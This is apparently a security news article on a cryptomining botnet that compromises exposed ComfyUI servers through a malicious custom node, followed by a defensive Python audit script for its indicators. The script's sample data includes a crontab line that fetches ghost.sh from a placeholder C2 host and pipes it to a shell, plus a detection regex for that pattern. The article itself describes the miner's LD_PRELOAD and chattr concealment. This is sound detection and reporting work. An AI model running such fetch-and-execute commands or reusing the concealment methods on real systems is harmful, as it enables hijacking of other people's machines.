Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign

The Hacker News, Apr 7, 2026

Why It Matters

The abuse demonstrates how quickly AI‑related services can become a revenue stream for cybercriminals, raising the risk profile for organizations deploying open‑source AI tools in the cloud. It underscores the need for hardened configurations and continuous monitoring to prevent botnet expansion and cryptojacking losses.

Key Takeaways

  • Over 1,000 public ComfyUI instances scanned daily
  • Scanner installs malicious nodes via ComfyUI‑Manager if absent
  • Compromised hosts run Monero and Conflux miners
  • Malware uses LD_PRELOAD to hide mining processes
  • Botnet also offers proxy services through Hysteria V2

Pulse Analysis

The rapid adoption of generative‑AI platforms has created a new attack surface: exposed AI service instances that lack proper authentication. ComfyUI, a widely used front‑end for Stable Diffusion, allows custom Python nodes, which attackers weaponize to execute arbitrary code. By continuously probing major cloud ranges, the campaign can locate vulnerable deployments in minutes, install a malicious node package, and pivot to a full‑blown cryptomining operation. This approach mirrors earlier botnet trends that repurpose misconfigured services for profit, but the focus on AI tools marks a shift toward higher‑value targets.

Technical analysis shows the threat actor leverages a custom "ComfyUI‑Shell‑Executor" package to fetch a persistent shell script (ghost.sh). The script disables shell history, kills competing miners, and employs LD_PRELOAD alongside chattr +i to conceal and protect the mining binaries, even from root. Persistence is reinforced by re‑executing the exploit each time ComfyUI starts and by downloading the payload every six hours. Beyond mining, the compromised hosts are enrolled in a Flask‑based command‑and‑control panel that can deploy Hysteria V2 proxies, turning the machines into sellable bandwidth assets for other malicious actors.
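The indicators in the paragraph above (a preloaded library, immutable mining binaries, a periodic fetch-and-pipe-to-shell refresh, and an unexpected package under ComfyUI's custom_nodes directory) can each be checked from collected host artifacts. The following audit helpers are an added example written for this article and are not code from The Hacker News or from the ComfyUI project; the library name, file paths, cron line, C2 placeholder and lsattr output are constructed sample data, and the allowlist of node packages is an assumption an operator would maintain for their own deployment.

```python
"""Offline host-audit helpers for the ComfyUI miner indicators described above.

Added example, not code from the article or the ComfyUI project. Every file
name, host and sample output below is constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    check: str
    detail: str


def audit_ld_preload(ld_so_preload_text: str) -> list[Finding]:
    """Flag every library listed in /etc/ld.so.preload. The article's malware
    uses LD_PRELOAD to hide the miner, and a server image that was not built
    with a preload file should have an empty or absent one."""
    libs = [ln.strip() for ln in ld_so_preload_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]
    return [Finding("ld_preload", f"preloaded library: {lib}") for lib in libs]


def audit_immutable(lsattr_lines: list[str]) -> list[Finding]:
    """Parse `lsattr -R` style output (attribute string, then path) and flag
    files carrying the immutable bit 'i', which chattr +i sets so that even
    root cannot remove the binaries without first clearing the attribute."""
    findings = []
    for line in lsattr_lines:
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        attrs, path = parts
        if "i" in attrs:
            findings.append(Finding("immutable", f"chattr +i set on {path}"))
    return findings


# A download piped straight into a shell; the six-hourly payload refresh in
# the article is one instance of this pattern.
_FETCH_PIPE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def audit_cron(crontab_lines: list[str]) -> list[Finding]:
    """Flag cron entries that fetch a remote script and execute it directly."""
    return [Finding("cron_fetch", line.strip()) for line in crontab_lines
            if line.strip() and not line.lstrip().startswith("#")
            and _FETCH_PIPE.search(line)]


def audit_custom_nodes(installed: list[str], allowlist: set[str]) -> list[Finding]:
    """Compare the custom_nodes directory listing against an operator-kept
    allowlist (assumed; ComfyUI itself ships no such list)."""
    return [Finding("custom_node", f"unexpected node package: {name}")
            for name in installed if name not in allowlist]


def hidden_pids(proc_pids: set[int], ps_pids: set[int]) -> set[int]:
    """PIDs visible in a /proc listing but absent from `ps` output. A preload
    hook that filters process-directory reads inside ps shows up as exactly
    this difference, provided the /proc listing came from a statically linked
    tool or from outside the host, since the hook applies to every
    dynamically linked program."""
    return proc_pids - ps_pids


# Constructed sample artifacts (not taken from the article).
SAMPLE_LD_SO_PRELOAD = "/usr/local/lib/libhide.so\n"
SAMPLE_LSATTR = [
    "----i---------e------- /tmp/.x/kswapd0",
    "--------------e------- /etc/hostname",
]
SAMPLE_CRONTAB = ["0 */6 * * * curl -fsSL http://C2-HOST-PLACEHOLDER/ghost.sh | sh"]
SAMPLE_NODES = ["ComfyUI-Manager", "ComfyUI-Shell-Executor"]
ALLOWED_NODES = {"ComfyUI-Manager"}


def run_sample_audit() -> list[Finding]:
    """Run every check over the constructed sample data."""
    return (audit_ld_preload(SAMPLE_LD_SO_PRELOAD)
            + audit_immutable(SAMPLE_LSATTR)
            + audit_cron(SAMPLE_CRONTAB)
            + audit_custom_nodes(SAMPLE_NODES, ALLOWED_NODES))


if __name__ == "__main__":
    for finding in run_sample_audit():
        print(f"[{finding.check}] {finding.detail}")
```

On a live host the inputs would come from `cat /etc/ld.so.preload`, `lsattr -R` over the writable directories, `crontab -l` for each user plus /etc/cron.d, and a listing of ComfyUI's custom_nodes directory. The checks are independent, so a single hit is worth investigating; all four together on one host match the behaviour the article describes.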

The broader implication for enterprises is clear: any publicly reachable AI service must be treated as a critical asset. Organizations should enforce strict network segmentation, disable unauthenticated custom node execution, and implement continuous vulnerability scanning for AI workloads. Cloud providers can aid by offering default authentication for UI endpoints and by flagging anomalous traffic patterns associated with botnet scanners. As botnet activity climbs—up 26% in early 2025—proactive hardening of AI infrastructure will be essential to curb the monetization of cryptomining and proxy services.
